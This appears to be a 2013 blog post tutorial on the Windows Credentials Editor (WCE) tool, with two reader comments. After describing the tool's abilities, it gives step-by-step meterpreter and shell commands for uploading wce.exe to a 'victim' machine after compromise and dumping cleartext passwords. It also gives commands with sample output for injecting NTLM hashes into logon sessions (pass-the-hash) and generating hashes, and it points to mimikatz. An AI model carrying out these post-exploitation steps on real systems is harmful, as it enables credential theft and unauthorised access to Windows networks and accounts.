Saturday, February 9, 2013

How to get windows passwords in plain text?


Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .
(2)Now type shell to get cmd of victim pc
(3)Type wce.exe -w to get password in clear text


List NTLM credentials in memory?


By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe

How to Change my current NTLM credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!



How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe


How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.


2 comments:

Unknown said...

amazing but i want 2 know more!!!

nirav desai said...

Thank you, you can download pdf file which are listed at end of article@Sanju kutty

Post a Comment

UA-35960349-1